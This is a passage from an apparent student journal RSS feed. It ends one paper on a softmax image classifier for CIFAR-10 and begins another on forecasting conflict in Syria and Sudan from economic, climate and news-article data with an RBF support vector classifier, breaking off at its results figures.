<p>Model Complexity: A softmax classifier has relatively low complexity, so its computation needs are small compared with a complex model like a CNN or a deep neural network. This modest complexity keeps the training time short.</p>



<p>Hardware Optimizations: The code emits a warning that it doesn&#8217;t use certain CPU features (like AVX2 and AVX) that could accelerate processing, meaning the code could have run faster if TensorFlow [1] had been optimized for the available hardware. But even without such optimizations, the lightweight model finishes training fast.</p>



<p>Batch Size and Number of Steps: The amount of data processed per step and the number of steps (in this case, 1,000) also determine execution time. Larger batches may converge in fewer steps but demand more memory, while smaller batches make each step cheaper but the gradient estimates noisier.</p>



<p>The model has the advantage of short training times for quick experiments, but at the expense of lower accuracy on a complex dataset like CIFAR-10.</p>



<figure class="wp-block-image size-large"><img loading="lazy" decoding="async" width="1024" height="223" src="https://exploratiojournal.com/wp-content/uploads/2024/12/image-8-1024x223.png" alt="" class="wp-image-4096" srcset="https://exploratiojournal.com/wp-content/uploads/2024/12/image-8-1024x223.png 1024w, https://exploratiojournal.com/wp-content/uploads/2024/12/image-8-300x65.png 300w, https://exploratiojournal.com/wp-content/uploads/2024/12/image-8-768x167.png 768w, https://exploratiojournal.com/wp-content/uploads/2024/12/image-8-1000x217.png 1000w, https://exploratiojournal.com/wp-content/uploads/2024/12/image-8-230x50.png 230w, https://exploratiojournal.com/wp-content/uploads/2024/12/image-8-350x76.png 350w, https://exploratiojournal.com/wp-content/uploads/2024/12/image-8-480x104.png 480w, https://exploratiojournal.com/wp-content/uploads/2024/12/image-8.png 1242w" sizes="(max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption"><em>Figure 1: output from the execution</em></figcaption></figure>



<h2 class="wp-block-heading"><strong>3. Discussion</strong></h2>



<p>Overall, immersing myself in the world of image classification has been an extremely enlightening, exciting, and complex experience. The journey started with understanding some basics of this field: what image classification is and how it all works behind the scenes. Essentially, teaching a computer to recognize and categorize images into the classes they belong to requires a good deal of programming, mathematics, and machine learning.</p>



<p>This took me into the rather complex process of building the classification program, ensuring that the code runs efficiently and supports the different operations needed for tasks such as image classification. I learned that one needs to work with a variety of datasets, understanding which ones train the model and which ones are for testing, and how this impacts the resulting accuracy and applicability of the model.</p>



<p>The other aspect of this journey involved learning how to load and preprocess data correctly. Handling datasets gets pretty complex at times, but I learned how to streamline the process so that my workflow runs smoothly. It was after building this foundation that I took on the challenge of developing my own image classifier.</p>



<p>Building the image classifier from scratch was an experience rich in challenges and rewards. It required learning foundational concepts and how to apply them in practice. The process taught me to be methodical about solving problems and to think critically, especially when debugging issues, exploring different architectures, and fine-tuning my model; this is what made the first time my model started making correct predictions feel so great.</p>



<p>This study has yielded significant insights as part of my learning journey. It provided a deeper understanding of machine learning and programming, and it has strengthened my appreciation of the complexity of problems in technology. Future work will focus on building on this foundation and diving into more profound concepts, not merely applying the gained knowledge to real-world problems. The prospects are endless, and I look forward to seeing where this journey takes me.</p>



<p>Mastering the art of image classification was in no way smooth sailing. It took a lot of time to grasp the concepts and mechanics underlying it. The process began with developing a softmax classifier, guided by a tutorial from a website. This was a fairly straightforward stage, but it got the ball rolling in understanding the true nature of the process and established a basis for eventual good performance.</p>



<p>Significant changes occurred when I attempted to build my own image classifier. The task was complex and engaging but also, at times, overwhelming and demanding. The most difficult part was integrating the CIFAR-10 dataset with custom labels, which really pushed me to my limits and tested all my problem-solving skills.</p>



<p>Although there were some hitches here and there, the struggle seemed worth every moment because it was very rewarding to overcome the obstacles; learning something I had always wanted to learn made the experience worthwhile. Some aspects, such as the softmax classifier, were easier to handle, but as a whole the process taught me how resilient and adaptable I can be, and it continues to sustain my passion to dig deeper into such topics.</p>



<h2 class="wp-block-heading"><strong>Conclusion</strong></h2>



<p>This paper describes in detail the steps involved in developing and applying a softmax classifier for image classification, using the CIFAR-10 dataset. Image classification is one of the main applications of neural networks, translating visual data into actionable insights. It plays a massive role in industries such as healthcare, security, and autonomous systems, where its effectiveness improves decision-making and operational efficiency.</p>



<p>The paper begins with the fundamental concepts of image classification: understanding visual data. Deep learning models, especially CNNs, have driven much of the advancement in image classification. CNNs can detect spatial hierarchies in images, starting from low-level features, such as edges, and building up to complex structures, such as objects. Vision transformers (ViTs) are an emerging technique that uses a self-attention mechanism to capture global context, sometimes even outperforming CNNs when applied to large datasets.</p>



<p>CIFAR-10 is a benchmark dataset for image classification models. It comprises 60,000 low-resolution images divided across 10 mutually exclusive classes (airplanes, cars, and various animals and vehicles), grouped into 50,000 training and 10,000 test images. The low resolution makes it hard for a model to draw meaningful features from so little visual information. Often, data augmentation techniques like cropping, flipping, or color jittering are applied to add diversity to the training process and counter overfitting.</p>



<p>The softmax classifier is an integral component of this image classification framework: the outputs of the neural network are converted into probability distributions over multiple classes. The softmax function normalizes those outputs so that the probabilities of all classes sum to one, yielding a likelihood for each class given the input. At training time, the classifier measures the difference between predicted and actual probabilities with a cross-entropy loss function and iteratively adjusts the weights to increase classification accuracy.</p>



<p>The softmax classifier code is written and structured entirely with TensorFlow. It includes the initialization of weights and biases, a forward pass to produce class probabilities, the computation of the loss, and weight updates using gradient descent. To train the model, batches of images are pushed forward while accuracy is monitored at intervals and the weights are continuously refined. Even though this method has many complexities, it provides the core foundational insights into image classification workflows.</p>



<p>The experiments expose the immense limitations of the softmax classifier on the CIFAR-10 dataset: after 1,000 training steps, the model reached an accuracy of 43% on the training set and only 26.5% on the test set. These figures indicate that the model, with its linear approach, failed to capture the complexity of the dataset. Well suited to some simpler tasks, the softmax classifier cannot handle datasets requiring much more advanced feature extraction.</p>



<p>The challenges faced in this project were underfitting (when a model fails to capture the patterns in the data) and the added dataset difficulties of working with custom labels. These challenges highlighted the need for more complex models like CNNs, which are far better at dealing with complex data. Moreover, the images of CIFAR-10 are at a low resolution, making the task more challenging by forcing the model to extract relevant features from a limited pixel space.</p>



<p>The project also touched on ethical and computational challenges in image recognition. Issues ranged from algorithmic bias and privacy concerns to the need for large quantities of labeled data and computational power. These issues illustrate the need for developing scalable, bias-free algorithms applicable to real-world settings.</p>



<p>Despite these restrictions, this project provided some very valuable learning opportunities. The experience of building and testing a softmax classifier brings insight into many real-world aspects of image classification. It highlighted the importance of iterative optimization, the difficulty of dealing with complex datasets, and the promise more advanced techniques hold for improving accuracy.</p>



<p>Future work in image classification could include the use of semi-supervised and unsupervised learning to decrease dependence on labeled training data. Techniques such as GANs can be used to produce synthetic training data and thus alleviate the scarcity of available data. In addition, integrating CNNs or more advanced architectures such as vision transformers may further enhance performance on datasets like CIFAR-10.</p>



<p>This project is at once a learning experience and a stepping stone toward further research in computer vision. Recognizing the limitations of simpler models and finding ways to move beyond them opens the door to more robust and effective image-classification solutions. The lessons learned here are not confined to academics; they already carry high practical applicability in medical care, autonomous systems, and security industries that work with visual data analysis.</p>



<figure class="wp-block-image size-large"><img loading="lazy" decoding="async" width="1024" height="683" src="https://exploratiojournal.com/wp-content/uploads/2024/12/image-9-1024x683.png" alt="" class="wp-image-4142" srcset="https://exploratiojournal.com/wp-content/uploads/2024/12/image-9-1024x683.png 1024w, https://exploratiojournal.com/wp-content/uploads/2024/12/image-9-300x200.png 300w, https://exploratiojournal.com/wp-content/uploads/2024/12/image-9-768x512.png 768w, https://exploratiojournal.com/wp-content/uploads/2024/12/image-9-1000x667.png 1000w, https://exploratiojournal.com/wp-content/uploads/2024/12/image-9-230x153.png 230w, https://exploratiojournal.com/wp-content/uploads/2024/12/image-9-350x233.png 350w, https://exploratiojournal.com/wp-content/uploads/2024/12/image-9-480x320.png 480w, https://exploratiojournal.com/wp-content/uploads/2024/12/image-9.png 1200w" sizes="(max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption">Figure 1: Training and Test Accuracy over Time Using a Softmax Classifier on CIFAR-10 Dataset</figcaption></figure>






<figure class="wp-block-table"><table class="has-fixed-layout"><tbody><tr><td>Metric</td><td>Value</td><td>Dataset</td><td>Notes</td></tr><tr><td>Training Accuracy</td><td>43%</td><td>Training Set</td><td>After 1000 steps</td></tr><tr><td>Test Accuracy</td><td>26.5%</td><td>Test Set</td><td>Indicates underfitting</td></tr><tr><td>Execution Time</td><td>5.77 seconds</td><td>Full Process</td><td>On CPU, unoptimized</td></tr></tbody></table><figcaption class="wp-element-caption">Table 1: Model Performance Metrics</figcaption></figure>






<h2 class="wp-block-heading"><strong>Citations</strong></h2>



<p><strong>[1] </strong><a href="https://www.tensorflow.org/tutorials/images/classification"><strong>https://www.tensorflow.org/tutorials/images/classification</strong></a><strong>&nbsp;</strong></p>



<p><strong>[2] </strong><a href="https://www.cs.toronto.edu/~kriz/cifar.html"><strong>https://www.cs.toronto.edu/~kriz/cifar.html</strong></a></p>



<p><strong>[3] </strong><a href="https://www.tandfonline.com/doi/full/10.1080/01431160600746456"><strong>https://www.tandfonline.com/doi/full/10.1080/01431160600746456</strong></a></p>



<p><strong>[4] </strong><a href="https://ieeexplore.ieee.org/abstract/document/4309314"><strong>https://ieeexplore.ieee.org/abstract/document/4309314</strong></a></p>



<p><strong>[5] </strong><a href="https://www.superannotate.com/blog/image-classification-basics"><strong>https://www.superannotate.com/blog/image-classification-basics</strong></a></p>



<p><strong>[6] </strong><a href="https://viso.ai/computer-vision/image-classification/"><strong>https://viso.ai/computer-vision/image-classification/</strong></a></p>



<p><strong>[7] </strong><a href="https://www.tensorflow.org/tutorials"><strong>https://www.tensorflow.org/tutorials</strong></a></p>



<p><strong>[8] </strong><a href="https://pyimagesearch.com/2016/09/12/softmax-classifiers-explained/"><strong>https://pyimagesearch.com/2016/09/12/softmax-classifiers-explained/</strong></a></p>



<p><strong>[9] </strong><a href="https://www.freecodecamp.org/news/how-to-build-a-simple-image-recognition-system-with-tensorflow-part-1-d6a775ef75d/"><strong>https://www.freecodecamp.org/news/how-to-build-a-simple-image-recognition-system-with-tensorflow-part-1-d6a775ef75d/</strong></a></p>



<hr style="margin: 70px 0;" class="wp-block-separator">



<div class="no_indent" style="text-align:center;">
<h4>About the author</h4>
<figure class="aligncenter size-large is-resized"><img loading="lazy" decoding="async" src="https://www.exploratiojournal.com/wp-content/uploads/2020/09/exploratio-article-author-1.png" alt="" class="wp-image-34" style="border-radius:100%;" width="150" height="150">
<h5>Sarikonda Grishmanth Reddy</h5><p>Sarikonda is an enthusiastic computer science student with a special interest in artificial intelligence, machine learning, and image classification. His academic path so far has been driven by an interest to discover new technologies and pursue a practical approach toward solving problems in real life. Beyond academics, Sarikonda heads the boys&#8217; hostel in his college as a Head Boy, and this has been honed to develop leadership and organizational skills. He also participates in planning and executing various social and charitable events, which has given him an opportunity to believe in the sentiments of community and serve society.
</p></figure></div>



<p>The post <a href="https://exploratiojournal.com/a-journey-into-image-classification-developing-and-implementing-a-custom-image-classifier/">A Journey into Image Classification: Developing and implementing a custom image classifier</a> appeared first on <a href="https://exploratiojournal.com">Exploratio Journal</a>.</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Determining the Likelihood of War in a Country in the Middle East and North Africa Based on Economic and Climate Data via Machine Learning</title>
		<link>https://exploratiojournal.com/determining-the-likelihood-of-war-in-a-country-in-the-middle-east-and-north-africa-based-on-economic-and-climate-data-via-machine-learning/?utm_source=rss&#038;utm_medium=rss&#038;utm_campaign=determining-the-likelihood-of-war-in-a-country-in-the-middle-east-and-north-africa-based-on-economic-and-climate-data-via-machine-learning</link>
		
		<dc:creator><![CDATA[Albert Liu]]></dc:creator>
		<pubDate>Tue, 01 Jul 2025 21:59:32 +0000</pubDate>
				<category><![CDATA[Computer Science]]></category>
		<category><![CDATA[Social Sciences]]></category>
		<guid isPermaLink="false">https://exploratiojournal.com/?p=4102</guid>

					<description><![CDATA[<p>Albert Liu<br />
Jordan High School</p>
<p>The post <a href="https://exploratiojournal.com/determining-the-likelihood-of-war-in-a-country-in-the-middle-east-and-north-africa-based-on-economic-and-climate-data-via-machine-learning/">Determining the Likelihood of War in a Country in the Middle East and North Africa Based on Economic and Climate Data via Machine Learning</a> appeared first on <a href="https://exploratiojournal.com">Exploratio Journal</a>.</p>
]]></description>
										<content:encoded><![CDATA[
<div class="wp-block-media-text is-stacked-on-mobile is-vertically-aligned-top" style="grid-template-columns:16% auto"><figure class="wp-block-media-text__media"><img loading="lazy" decoding="async" width="200" height="200" src="https://www.exploratiojournal.com/wp-content/uploads/2020/09/exploratio-article-author-1.png" alt="" class="wp-image-488 size-full" srcset="https://exploratiojournal.com/wp-content/uploads/2020/09/exploratio-article-author-1.png 200w, https://exploratiojournal.com/wp-content/uploads/2020/09/exploratio-article-author-1-150x150.png 150w" sizes="(max-width: 200px) 100vw, 200px" /></figure><div class="wp-block-media-text__content">
<p class="no_indent margin_none"><strong>Author:</strong> Albert Liu<br><strong>Mentor</strong>: Tom Bertalan<br><em>Jordan High School</em></p>
</div></div>



<h2 class="wp-block-heading">Abstract</h2>



<p>War is a major issue in our world today, with 56 ongoing conflicts worldwide, the most since WWII. This is extremely concerning, as most people are unaware of most of the wars or coups that happen in different countries. A particularly unstable region in this age is the Middle East and North Africa (MENA). This study attempts to predict the onset of wars and coups in the MENA region by using economic and weather data and comparing it to economic and weather data captured during times of conflict in these areas. A classification pipeline was built with weather and economic data from various time periods in places that were in conflict at the time. Articles on events in these regions were also collected to gauge the situation at any given time. The model fits this data, together with features extracted from the articles, and outputs the likelihood of war in a particular area based on the economic and weather data it receives. If we can predict wars and other conflicts before they happen, we can better prevent them or decrease the casualty rate. While this is to some extent a report of work done, it is also a proposal for future work.</p>



<h2 class="wp-block-heading">1 Introduction</h2>



<p>Although wars and coups have occurred consistently throughout history, the frequency and intensity of such violent conflicts have notably increased in recent years. In 2021, there were 27 ongoing conflicts, with the number steadily rising every year (Koop 21; Rustard 24). Today, the world is experiencing the most conflicts and wars it has faced since WW2 (Archie 22). Although there are many terrible events happening around the world, affecting different countries everywhere, the general public only knows about a few of them, and most are unaware of how drastic they are.</p>



<p>Unfortunately, this also means that there isn’t too much news coverage and aid for the issues faced by countries experiencing lesser-known conflicts, as sometimes it gets too dangerous in certain areas for people to help (Burchell 2020). This model can be utilized to identify early indicators of unrest and the onset of conflict in specific regions, enabling proactive intervention to mitigate escalation. Ideally, specialists and humanitarian organizations would have the ability to anticipate areas at risk of instability, allowing for preemptive measures that reduce the potential for widespread harm. While there is a possibility that such a model could be misused by authoritarian parties to better monitor and suppress dissent, this risk can be managed with ethical oversight and responsible implementation. This paper demonstrates a program that could allow for the prediction of future conflicts in the MENA region using climate and economic data.</p>



<h2 class="wp-block-heading">2 Literature Review</h2>



<p>The purpose of this literature review is to determine which factors play an important role in causing conflict, and ways we can look for such factors in advance to prevent such events. Nations have declared war on other nations or groups for a variety of reasons. Some have been more abstract, such as conflicts between religions or cultures, while others were more concrete, such as the need for more land, population, or resources. However, because of World War II, war and conflict in general have changed irrevocably. Conflicts are now characterized by better surveillance technologies, with new inventions such as drones and more accurate weapons. They also tend to involve many civilians, rather than just soldiers, and often involve various factions, some of which aren&#8217;t state-affiliated. In this new post-World War II era, conflicts have come to be coined by US analysts as Fourth-Generation Warfare (Holbrook 20). This era has also seen a slow decline in foreign wars, yet the number of civil wars has started to rise, with the number of such conflicts having tripled since the last decade (von Einsiedel 2017).</p>



<p>A civil war, defined by Britannica, is a conflict that involves the clashing of multiple organized non-state actors, which differs from interstate, or foreign wars, which are wars declared on one nation by another. There are two wars that have the world’s attention currently, the Russo-Ukrainian and Israel-Palestinian Conflicts. Although some parties claim otherwise, both happen to be foreign wars, conflicts waged by one functional government against another. Although both are classified as interstate wars, their occurrence represents a deviation from the declining trend of foreign conflicts, and their prominence in global discourse can be attributed to their relative rarity compared to the numerous civil wars that commonly affect failed states.</p>



<p>Although there seem to be a plethora of differences between the two types of conflict, Lemke and Cunningham (2009) conclude that there is little point in making distinctions between the two. Even so, distinguishing between the two types could provide more insight and is something to look into. For now, though, research should instead prioritize evaluating the overall effectiveness of potential factors as catalysts for conflict. Although there are many different factors that could influence the decision to declare war, there isn&#8217;t a definitive determinant that inevitably leads to war. Since there isn&#8217;t one deciding factor behind all conflicts, many researchers attempt to identify the factor, or set of factors, with the biggest impact on whether wars start or not.</p>



<p>According to Stewart (2002), war is strongly influenced by the economic issues of a nation and its surrounding area at a given time. Her research paper, “Root causes of violent conflict in developing countries”, focuses on four economic hypotheses and how they could contribute to the start of intra-state wars in the modern era: the Group Motivation Hypothesis, the Private Motivation Hypothesis, Failure of the Social Contract, and the Green War Hypothesis. While the paper offers in-depth information on how economics could cause such conflicts, it excludes many other factors and does not go into detail on political, religious, cultural, resource-related, geographic, or climatic ones. Although economics undeniably plays a major part in the internal and foreign situation of a state, it should not be the only factor considered. Another thing that changed between 2002 and the present day is the US’s involvement and policies regarding the Middle East after 9/11 (Esfandiary 2021). Although written post-9/11, the article predates major changes in the political landscape of the Middle East and the realization of the full consequences of the US’s actions. Despite this, it remains applicable to some degree, as the economic factors described in Stewart’s writing would still hold major influence over a nation’s stability and tendency to declare war.</p>



<p>Coccia (2019) surveys many theories that have been used to explain how and why wars happen, elaborating on both historical and modern accounts of the causes of war and conflict. Modern theories could explain a large part of why such conflicts happen, and the inclusion of past theories offers insight into how the modern ones developed. The contents of the paper are mostly theoretical, identifying reasons that countries would declare war and other theories on the nature of conflict. Although the paper focuses on foreign wars and does not address civil wars, it still provides valuable information on why conflicts could happen and the logic behind how they could start. Even after a researcher has chosen which cause of war to investigate further, there are a variety of ways to find, categorize, and store the data they use.</p>



<p>To find reasons for involvement in wars, Makarov (2015) uses statistics, taking data from periods when a given nation is either at war or at peace. The paper considers political (e.g. diplomacy), economic, and religious factors that could influence the likelihood a country would be in a state of warfare. Statistical models and distributions are then used to build graphs and project the effects of these factors. However, the way statistics are used in Makarov’s case differs from this paper’s approach. While Makarov focuses on why certain nations become involved in wars, this paper attempts to facilitate the prevention of such conflicts by picking up on trends that have been seen before and predicting the likelihood of conflict in a given area.</p>



<h2 class="wp-block-heading">3 Methods</h2>



<p>This paper primarily examines the economic and climatic factors that contribute to the onset of war, analyzing their correlation with events reported in news articles. The model utilizes features extracted from articles to assess the severity of conflict in a given region at a given time and integrates economic and climate data to evaluate their potential influence on the situation. Research from the UN shows that climate is important to consider, as it could determine whether a country faces civil unrest or even wages war against other nations. If a country has faced atypical climate conditions for its region over an extended period, an assortment of problems can follow. A 2021 UN report states that extreme weather and climate change, along with other factors such as disease, have caused many droughts and subsequent food shortages in Latin America, Asia, and Africa (UNFCCC 2021). Similar trends have appeared before and during outbreaks of war, with droughts and food shortages caused by drastic regional climate change. This could drive leaders to fight for precious resources or cause parts of a country to revolt against the central government. Economic conditions are also important to consider, as harsher economic times can cause unrest and increase the chances of conflict, whether from disgruntled civilians or a government desperate to alleviate its problems.</p>



<p>The code for the prediction model first gathers economic and climate data, as well as articles and events corresponding to different times during a war. These data points are what the model later trains and tests on to gauge the accuracy of its results. The model is trained on data from the Darfur conflict and the Syrian civil war, occurring in Sudan and Syria respectively, although more conflicts in the region could be added for more complex and accurate predictions. To encode the articles into a machine-readable form, Qdrant’s FastEmbed, an embedding library, was used to turn the raw article text into feature vectors, whose pairwise cosine similarity ranges from −1 to 1 (qdrant Version 0.6.0). The outputs/events, originally represented as strings (e.g. ’war’ or ’coups’), are transformed into k-hot encoded vectors to facilitate data visualization. This multi-label k-hot encoding allows multiple events occurring within a single time period to be represented in one vector, thereby enhancing the clarity of the data.</p>
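


<p>To make this concrete, the following is a minimal sketch of the two encoding steps, assuming the fastembed and scikit-learn packages; the embedding model name, the example articles, and the event labels are illustrative rather than the study’s actual inputs.</p>



<pre class="wp-block-code"><code>import numpy as np
from fastembed import TextEmbedding
from sklearn.preprocessing import MultiLabelBinarizer

articles = [
    "Protests erupted in the capital after fuel prices doubled.",
    "Ceasefire talks stalled as clashes resumed near the border.",
]

# Each article becomes a dense feature vector; the cosine similarity of any
# two such vectors falls between -1 and 1.
embedder = TextEmbedding(model_name="BAAI/bge-small-en-v1.5")
article_vectors = np.array(list(embedder.embed(articles)))

# Events are multi-label, so a k-hot encoding lets several events share one
# row (e.g. a coup and clashes reported in the same period).
events_per_period = [["war"], ["coup", "clashes"]]
encoder = MultiLabelBinarizer()
event_matrix = encoder.fit_transform(events_per_period)
print(encoder.classes_)  # ['clashes' 'coup' 'war']
print(event_matrix)      # rows of 0/1 flags aligned with the periods above</code></pre>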



<p>Before training and testing, it is necessary to interpolate periods with no events, articles, or other data. The analysis period is defined from the earliest to the most recent data point, with all intervening empty time periods requiring interpolation to ensure data continuity. Grab-and-hold interpolation is used to fill all dates with the economic and climate data from previous data points: empty time periods are filled with the values of the most recent time that has data. If datetime periods are requested earlier than the earliest recorded economic or climate data point, all datetime periods before that first data point are extrapolated with its values. After all empty datetimes have been filled in, the article features, economic data, and climate data are stacked and stored in a single array of features.</p>
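


<p>In pandas terms, grab-and-hold filling corresponds to a forward fill, with a trailing back fill covering dates before the first observation. Below is a hedged sketch with invented column names and values.</p>



<pre class="wp-block-code"><code>import numpy as np
import pandas as pd

dates = pd.date_range("2013-01-01", "2013-01-07", freq="D")
raw = pd.DataFrame(
    {
        "gdp_per_capita": [None, 1500.0, None, None, 1480.0, None, None],
        "avg_temp_c": [None, 21.3, None, None, 22.1, None, None],
    },
    index=dates,
)

# Forward-fill holds the most recent observed value ("grab and hold");
# the trailing back-fill extrapolates dates before the first data point
# with that first point's values.
filled = raw.ffill().bfill()

# Stack the article feature vectors next to the economic/climate columns
# to form the single feature array described above (random stand-ins here).
article_features = np.random.default_rng(0).normal(size=(len(filled), 4))
features = np.hstack([article_features, filled.to_numpy()])
print(features.shape)  # (7, 6): 4 article features + 2 filled data columns</code></pre>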



<p>The classifier works by binning all dates into larger intervals. The original prediction model required daily data across the entire time span to make predictions, which resulted in long processing times and reduced accuracy due to repetitive, interpolation-induced values. To address this, the classifier utilizes a sliding window approach, aggregating data into one-week intervals. This consolidates multiple days of data into a single time frame, improving both computational efficiency and model performance.</p>
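


<p>A minimal sketch of the binning and windowing steps is shown below; the daily stand-in features, the mean aggregation, and the one-week window width are assumptions for illustration.</p>



<pre class="wp-block-code"><code>import numpy as np
import pandas as pd

# Stand-in daily features (e.g. the stacked array from the previous sketch),
# indexed by date so they can be binned into one-week intervals.
days = pd.date_range("2013-01-01", periods=35, freq="D")
daily = pd.DataFrame(np.random.default_rng(0).normal(size=(35, 6)), index=days)
weekly = daily.resample("W").mean()  # one aggregated row per week

def make_windows(features, labels, width=1):
    # Pair each week's k-hot event labels with the `width` preceding weeks
    # of aggregated features, flattened into one training sample.
    X, y = [], []
    for t in range(width, len(features)):
        X.append(features[t - width:t].ravel())
        y.append(labels[t])
    return np.array(X), np.array(y)

weekly_labels = np.random.default_rng(1).integers(0, 2, size=(len(weekly), 3))
X, y = make_windows(weekly.to_numpy(), weekly_labels)
print(X.shape, y.shape)  # windowed feature rows and k-hot event targets</code></pre>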



<p>After the events and the features have been interpolated, a sliding window classifier with a Radial Basis Function (RBF) kernel is trained to predict the probability of conflict in certain regions.</p>
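


<p>The classifier stage might look like the following sketch, assuming scikit-learn; because the events are k-hot (multi-label), one RBF-kernel SVC is wrapped per event label here, and the training arrays are random stand-ins rather than the study’s data.</p>



<pre class="wp-block-code"><code>import numpy as np
from sklearn.multiclass import OneVsRestClassifier
from sklearn.svm import SVC

rng = np.random.default_rng(0)
X_train = rng.normal(size=(120, 10))          # stand-in windowed feature rows
y_train = rng.integers(0, 2, size=(120, 3))   # stand-in k-hot event labels

# One RBF-kernel SVC per event label; probability=True enables per-event
# probability estimates via Platt scaling.
clf = OneVsRestClassifier(SVC(kernel="rbf", probability=True))
clf.fit(X_train, y_train)
print(clf.predict_proba(X_train[:2]))  # per-event conflict probabilities</code></pre>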



<h2 class="wp-block-heading">4 Results</h2>



<p>Climate, and to a smaller extent weather, plays a big role in the likelihood of conflict, as it can affect resource scarcity (crops and water), economic prosperity, and more. Figure 1 examines the effects of changing climate and deviations in average temperature on the occurrence of conflict.</p>



<figure class="wp-block-image size-large"><img loading="lazy" decoding="async" width="1024" height="523" src="https://exploratiojournal.com/wp-content/uploads/2025/07/Screenshot-2025-07-01-at-10.45.05 PM-1024x523.png" alt="" class="wp-image-4103" srcset="https://exploratiojournal.com/wp-content/uploads/2025/07/Screenshot-2025-07-01-at-10.45.05 PM-1024x523.png 1024w, https://exploratiojournal.com/wp-content/uploads/2025/07/Screenshot-2025-07-01-at-10.45.05 PM-300x153.png 300w, https://exploratiojournal.com/wp-content/uploads/2025/07/Screenshot-2025-07-01-at-10.45.05 PM-768x392.png 768w, https://exploratiojournal.com/wp-content/uploads/2025/07/Screenshot-2025-07-01-at-10.45.05 PM-1536x785.png 1536w, https://exploratiojournal.com/wp-content/uploads/2025/07/Screenshot-2025-07-01-at-10.45.05 PM-1000x511.png 1000w, https://exploratiojournal.com/wp-content/uploads/2025/07/Screenshot-2025-07-01-at-10.45.05 PM-230x117.png 230w, https://exploratiojournal.com/wp-content/uploads/2025/07/Screenshot-2025-07-01-at-10.45.05 PM-350x179.png 350w, https://exploratiojournal.com/wp-content/uploads/2025/07/Screenshot-2025-07-01-at-10.45.05 PM-480x245.png 480w, https://exploratiojournal.com/wp-content/uploads/2025/07/Screenshot-2025-07-01-at-10.45.05 PM.png 1942w" sizes="(max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption">Figure 1: Two variable line graph that shows the correlation between the average temperature in Celsius of Syria and Sudan and the article features of both regions</figcaption></figure>



<p>Figure 1 plots the article feature values, the abstract features of information extracted from the articles on which the SVC’s output probabilities are based, against average temperature. Based on the data presented in Figure 1, an inverse correlation between the two variables is evident. The trend is particularly noticeable from the starting point of the figure through the 2020s. With the exception of early 2023, a significant rise in average temperature was consistently accompanied by a decrease in the article feature value, and vice versa.</p>



<figure class="wp-block-image size-large"><img loading="lazy" decoding="async" width="1024" height="505" src="https://exploratiojournal.com/wp-content/uploads/2025/07/Screenshot-2025-07-01-at-10.57.36 PM-1024x505.png" alt="" class="wp-image-4108" srcset="https://exploratiojournal.com/wp-content/uploads/2025/07/Screenshot-2025-07-01-at-10.57.36 PM-1024x505.png 1024w, https://exploratiojournal.com/wp-content/uploads/2025/07/Screenshot-2025-07-01-at-10.57.36 PM-300x148.png 300w, https://exploratiojournal.com/wp-content/uploads/2025/07/Screenshot-2025-07-01-at-10.57.36 PM-768x379.png 768w, https://exploratiojournal.com/wp-content/uploads/2025/07/Screenshot-2025-07-01-at-10.57.36 PM-1536x758.png 1536w, https://exploratiojournal.com/wp-content/uploads/2025/07/Screenshot-2025-07-01-at-10.57.36 PM-1000x493.png 1000w, https://exploratiojournal.com/wp-content/uploads/2025/07/Screenshot-2025-07-01-at-10.57.36 PM-230x113.png 230w, https://exploratiojournal.com/wp-content/uploads/2025/07/Screenshot-2025-07-01-at-10.57.36 PM-350x173.png 350w, https://exploratiojournal.com/wp-content/uploads/2025/07/Screenshot-2025-07-01-at-10.57.36 PM-480x237.png 480w, https://exploratiojournal.com/wp-content/uploads/2025/07/Screenshot-2025-07-01-at-10.57.36 PM.png 1966w" sizes="(max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption">Figure 2: Line Graph which depicts the economic conditions of Syria and Sudan via GDP per Capita in USD and the subsequent conditions of conflict within these two nations</figcaption></figure>



<p>Figure 2 illustrates the relationship between a nation’s economic conditions and its propensity to experience foreign conflicts or civil unrest. The graph tends to show an inverse relationship between the two variables for Syria. Although the graph uses only one feature from the articles and cannot be used to draw definitive conclusions, it is an interesting pattern.</p>



<p>In contrast, Sudan demonstrated a somewhat different pattern. Its GDP per capita appeared to be inversely correlated with the article feature value, particularly in the years leading up to 2018. Although the article feature values do not directly correlate with the frequency or severity of a conflict, an increase could still be influenced by the expansion of conflicts, as wars can drive the factors that contribute to their growth. The localized nature of the Sudanese conflict in the Darfur region could have influenced this inconsistency. One reason the article feature value increased could be that before 2018, the conflict primarily affected the Darfur area while the rest of the country experienced minimal conflict. This regional concentration likely explains why Sudan was generally less impacted by fluctuations in the escalation or de-escalation of conflict. In 2018, however, the conflict significantly expanded into surrounding areas such as Kordofan and Blue Nile, which may explain the country’s increasing vulnerability to these events. After this period, the trend began to align more closely with Syria’s, before a notable surge in GDP per capita during a phase of reduced conflict around early 2023, greatly surpassing Syria’s economic growth over the same time frame.</p>



<figure class="wp-block-image size-large"><img loading="lazy" decoding="async" width="1024" height="534" src="https://exploratiojournal.com/wp-content/uploads/2025/07/Screenshot-2025-07-01-at-10.47.32 PM-1024x534.png" alt="" class="wp-image-4105" srcset="https://exploratiojournal.com/wp-content/uploads/2025/07/Screenshot-2025-07-01-at-10.47.32 PM-1024x534.png 1024w, https://exploratiojournal.com/wp-content/uploads/2025/07/Screenshot-2025-07-01-at-10.47.32 PM-300x157.png 300w, https://exploratiojournal.com/wp-content/uploads/2025/07/Screenshot-2025-07-01-at-10.47.32 PM-768x401.png 768w, https://exploratiojournal.com/wp-content/uploads/2025/07/Screenshot-2025-07-01-at-10.47.32 PM-1536x802.png 1536w, https://exploratiojournal.com/wp-content/uploads/2025/07/Screenshot-2025-07-01-at-10.47.32 PM-1000x522.png 1000w, https://exploratiojournal.com/wp-content/uploads/2025/07/Screenshot-2025-07-01-at-10.47.32 PM-230x120.png 230w, https://exploratiojournal.com/wp-content/uploads/2025/07/Screenshot-2025-07-01-at-10.47.32 PM-350x183.png 350w, https://exploratiojournal.com/wp-content/uploads/2025/07/Screenshot-2025-07-01-at-10.47.32 PM-480x251.png 480w, https://exploratiojournal.com/wp-content/uploads/2025/07/Screenshot-2025-07-01-at-10.47.32 PM.png 1874w" sizes="(max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption">Figure 3: Conflicts throughout the years in the MENA region, sorted into foreign wars and internal conflicts (i.e. coups, civil wars, clashes against terrorist groups)</figcaption></figure>



